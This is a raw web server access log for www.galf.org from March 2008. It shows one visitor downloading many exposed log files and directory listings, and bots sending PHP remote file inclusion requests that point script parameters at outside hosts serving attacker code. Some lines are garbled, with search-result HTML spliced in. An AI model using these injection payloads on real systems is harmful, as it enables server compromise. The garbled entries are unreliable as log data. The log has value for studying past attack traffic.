140.113.4.81 - - [30/Mar/2008:19:07:54 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:08:00 -0700] "GET /logs/access_080310.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:08:03 -0700] "GET /logs/access_070813.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:08:07 -0700] "GET /logs/access_071028.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:08:10 -0700] "GET /logs/access_070820.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)" "www.galf.org"
212.116.174.9 - - [30/Mar/2008:19:08:12 -0700] "GET /logs/access_070827.log//faqsupport/samplefaqsupport.php?path[docroot]=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:08:12 -0700] "GET /logs/access_071119.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:08:15 -0700] "GET /logs/access_071126.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:08:19 -0700] "GET /logs/access_080128.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:08:22 -0700] "GET /logs/access_071203.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:08:25 -0700] "GET /logs/access_070917.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "www.galf.org"
62.163.141.54 - - [30/Mar/2008:19:08:26 -0700] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.col.fr/img/xpll.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:08:29 -0700] "GET /logs/access_071210.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:08:33 -0700] "GET /logs/access_071008.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:08:36 -0700] "GET /logs/access_070924.log HTTP/1.1" 200 589824 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.galf.org"
87.106.163.232 - - [30/Mar/2008:19:08:36 -0700] "GET /logs/access_071203.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.capecoral-golf.com/tsys/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.163.232 - - [30/Mar/2008:19:08:36 -0700] "GET /logs/access_071008.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.capecoral-golf.com/tsys/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:08:37 -0700] "GET /logs/?M=A HTTP/1.1" 200 6944 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:08:38 -0700] "GET /logs/?M=D HTTP/1.1" 200 6944 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:08:41 -0700] "GET /logs/scripts.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:08:45 -0700] "GET /logs/access_071015.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:08:45 -0700] "GET /cendoc/?N=A HTTP/1.1" 200 526 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:08:46 -0700] "GET /cendoc/?N=D HTTP/1.1" 200 526 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:08:49 -0700] "GET /logs/access_071022.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:08:53 -0700] "GET /logs/?D=A HTTP/1.1" 200 6944 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:08:56 -0700] "GET /logs/access_071014.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:08:57 -0700] "GET /logs/?D=D HTTP/1.1" 200 6944 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:08:58 -0700] "GET /logs/access.log HTTP/1.1" 200 80010 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:00 -0700] "GET /?M=A HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:05 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:06 -0700] "GET /tmp/?N=D HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:06 -0700] "GET /tmp/?N=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:07 -0700] "GET /tmp/?A HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:08 -0700] "GET /tmp/?M=A HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:08 -0700] "GET /tmp/?M=D HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:09 -0700] "GET /tmp/?D=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:10 -0700] "GET /tmp/?D=D HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:11 -0700] "GET /labia/ HTTP/1.1" 200 524 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:11 -0700] "GET /labia/?N=D HTTP/1.1" 200 524 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:13 -0700] "GET /labia/?D=A HTTP/1.1" 200 524 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:14 -0700] "GET /labia/?D=D HTTP/1.1" 200 524 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:15 -0700] "GET /labia/?A HTTP/1.1" 200 524 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
89.149.195.135 - - [30/Mar/2008:19:09:16 -0700] "GET /logs/sub.php?menu=http://cct.vg/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
89.149.195.135 - - [30/Mar/2008:19:09:16 -0700] "GET /sub.php?menu=http://cct.vg/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:17 -0700] "GET /?D=D HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:20 -0700] "GET /logs/access_080317.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:23 -0700] "GET /logs/access_071105.log HTTP/1.1" 200 589824 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:26 -0700] "GET /logs/access_080107.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:29 -0700] "GET /logs/access_080324.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:32 -0700] "GET /logs/access_070827.log HTTP/1.1" 200 549059 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:35 -0700] "GET /logs/access_071112.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:36 -0700] "GET /?A HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:40 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:43 -0700] "GET /logs/access_080331.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:46 -0700] "GET /logs/access_070826.log HTTP/1.1" 200 589824 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:49 -0700] "GET /logs/access_080121.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)" "www.galf.org"
210.86.238.86 - - [30/Mar/2008:19:09:55 -0700] "GET /logs/access_080225.log//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:56 -0700] "GET /logs/access_070709.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:09:57 -0700] "GET /logs/?A HTTP/1.1" 200 6944 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:10:00 -0700] "GET /logs/access_070903.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:10:03 -0700] "GET /logs/access_070716.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:10:06 -0700] "GET /logs/access_070910.log HTTP/1.1" 200 589824 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:10:09 -0700] "GET /logs/access_071001.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:10:13 -0700] "GET /logs/access_070723.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:10:15 -0700] "GET /logs/access_080204.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:10:16 -0700] "GET /cendoc/?M=A HTTP/1.1" 200 526 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:10:16 -0700] "GET /logs/%22http:/216.109.125.130/search/cachei=UTF-8%26p=%22cjaycontent%22:.se%26u=www.galf.org/logs/access_070827.log%26w=cjaycontent%20.se%26d=UrJ5MHDuQFPx%26icp=1%26.intl=us%22%3ECached%3C/a%3E%20%3C/div%3E%/li%3E%3Cli%3E%3Cdiv%20cl2res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=yschttl%20href=%22http:/www.alldredgeacademy.org/awstats/data/awstats012008.alldredgeacademy.org.txt%22%20%3Ealldredgeacademy.org/awstats/data/awstats012008.alldredgeacademy.org.txt%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=abstr%3E...%20modules/cjaycontent/admin/editor2/errors.php%201%20-%20/administrator/components%20...%20class.php=http:/www.nettogolf.se/nettogolf/filer/mic22.txt%204%20-%20/awstats/data%20...%3C/div%3E%20%3Cspan%20class=url%3Ealldredgeacademy.org/awstats/data/awstats012008.alldredgeacademy.or...%3C/span%3E%20%20-%20%3Cem%3E174k%3C/em%3E%20%20-%20%3Ca%20hroceanserver2005/us1:71.162.112.140.125%20-%20-%20%5B27/Jan/2008:21:58:20%20-080wapjimmy/us1:118.165.64.211.212.215.63 - - [30/Mar/2008:19:10:17 -0700] "GET /logs/%22http:/216.109.125.130/search/cachei=UTF-8%26p=%22cjaycontent%22:.se%26u=www.galf.org/logs/access_070827.log%26w=cjaycontent%20.se%26d=UrJ5MHDuQFPx%26icp=1%26.intl=us%22%3ECached%3C/a%3E%20%3C/div%3E%/li%3E%3Cli%3E%3Cdiv%20cl2res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=yschttl%20href=%22http:/www.alldredgeacademy.org/awstats/data/awstats012008.alldredgeacademy.org.txt%22%20%3Ealldredgeacademy.org/awstats/data/awstats012008.alldredgeacademy.org.txt%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=abstr%3E...%20modules/cjaycontent/admin/editor2/errors.php%201%20-%20/administrator/components%20...%20class.php=http:/www.nettogolf.se/nettogolf/filer/mic22.txt%204%20-%20/awstats/data%20...%3C/div%3E%20%3Cspan%20class=url%3Ealldredgeacademy.org/awstats/data/awstats012008.alldredgeacademy.or...%3C/span%3E%20%20-%20%3Cem%3E174k%3C/em%3E%20%20-%20%3Ca%20hrphotoimpactpixels_1/us1:62.112.140.125%20-%20-%20%5B27/Jan/2008:17:08:20%20-080majikmushroom54542/us1:7211.212.215.63 - - [30/Mar/2008:19:10:20 -0700] "GET /logs/access_070730.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:10:20 -0700] "GET /cendoc/?M=D HTTP/1.1" 200 526 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:10:21 -0700] "GET /logs/%22http:/216.109.125.130/search/cachei=UTF-8%26p=%22cjaycontent%22:.se%26u=www.galf.org/logs/access_070827.log%26w=cjaycontent%20.se%26d=UrJ5MHDuQFPx%26icp=1%26.intl=us%22%3ECached%3C/a%3E%20%3C/div%3E%/li%3E%3Cli%3E%3Cdiv%20cl2res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=yschttl%20href=%22http:/www.alldredgeacademy.org/awstats/data/awstats012008.alldredgeacademy.org.txt%22%20%3Ealldredgeacademy.org/awstats/data/awstats012008.alldredgeacademy.org.txt%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=abstr%3E...%20modules/cjaycontent/admin/editor2/errors.php%201%20-%20/administrator/components%20...%20class.php=http:/www.nettogolf.se/nettogolf/filer/mic22.txt%204%20-%20/awstats/data%20...%3C/div%3E%20%3Cspan%20class=url%3Ealldredgeacademy.org/awstats/data/awstats012008.alldredgeacademy.or...%3C/span%3E%20%20-%20%3Cem%3E174k%3C/em%3E%20%20-%20%3Ca%20hrkhlnm/us1:76.104.152.10262.112.140.125%20-%20-%20%5B27/Jan/2008:17:08:35%20-080wapjimmy/us1:140.117.166211.212.215.63 - - [30/Mar/2008:19:10:24 -0700] "GET /logs/access_071217.log HTTP/1.1" 200 589824 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:10:27 -0700] "GET /logs/access_080211.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:10:27 -0700] "GET /logs/%22http:/216.109.125.130/search/cachei=UTF-8%26p=%22cjaycontent%22:.se%26u=www.galf.org/logs/access_070827.log%26w=cjaycontent%20.se%26d=UrJ5MHDuQFPx%26icp=1%26.intl=us%22%3ECached%3C/a%3E%20%3C/div%3E%/li%3E%3Cli%3E%3Cdiv%20cl2res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=yschttl%20href=%22http:/www.alldredgeacademy.org/awstats/data/awstats012008.alldredgeacademy.org.txt%22%20%3Ealldredgeacademy.org/awstats/data/awstats012008.alldredgeacademy.org.txt%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=abstr%3E...%20modules/cjaycontent/admin/editor2/errors.php%201%20-%20/administrator/components%20...%20class.php=http:/www.nettogolf.se/nettogolf/filer/mic22.txt%204%20-%20/awstats/data%20...%3C/div%3E%20%3Cspan%20class=url%3Ealldredgeacademy.org/awstats/data/awstats012008.alldredgeacademy.or...%3C/span%3E%20%20-%20%3Cem%3E174k%3C/em%3E%20%20-%20%3Ca%20hryata61/us1:82.204.48.180221.141.3.102%20-%20-%20%5B27/Jan/2008:21:59:19%20-0800cbaq/us1:201.231.22.131
211.212.215.63 - - [30/Mar/2008:19:10:28 -0700] "GET /logs/?N=A HTTP/1.1" 200 6944 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:10:29 -0700] "GET /cendoc/?D=A HTTP/1.1" 200 526 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:10:30 -0700] "GET /cendoc/?D=D HTTP/1.1" 200 526 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:10:31 -0700] "GET /labia/?N=A HTTP/1.1" 200 524 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:10:34 -0700] "GET /logs/access_071224.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)" "www.galf.org"
211.212.215.63 - - [30/Mar/2008:19:10:34 -0700] "GET /logs/?N=D HTTP/1.1" 200 6944 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:11:54 -0700] "GET /logs/access_071203.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:11:54 -0700] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:11:55 -0700] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:11:55 -0700] "GET /logs/access_071008.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:11:56 -0700] "GET /logs/access_071203.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:11:56 -0700] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:11:57 -0700] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:11:57 -0700] "GET /logs/access_071008.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:19:12:02 -0700] "GET /logs/access_071203.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:19:12:02 -0700] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:19:12:02 -0700] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:19:12:02 -0700] "GET /logs/access_071008.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:19:12:03 -0700] "GET /logs/access_071203.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:19:12:03 -0700] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:19:12:03 -0700] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:19:12:03 -0700] "GET /logs/access_071008.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:12:23 -0700] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:12:23 -0700] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
140.113.4.81 - - [30/Mar/2008:19:12:24 -0700] "GET /logs/access_070924.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:12:35 -0700] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:12:35 -0700] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:19:12:55 -0700] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:19:12:55 -0700] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
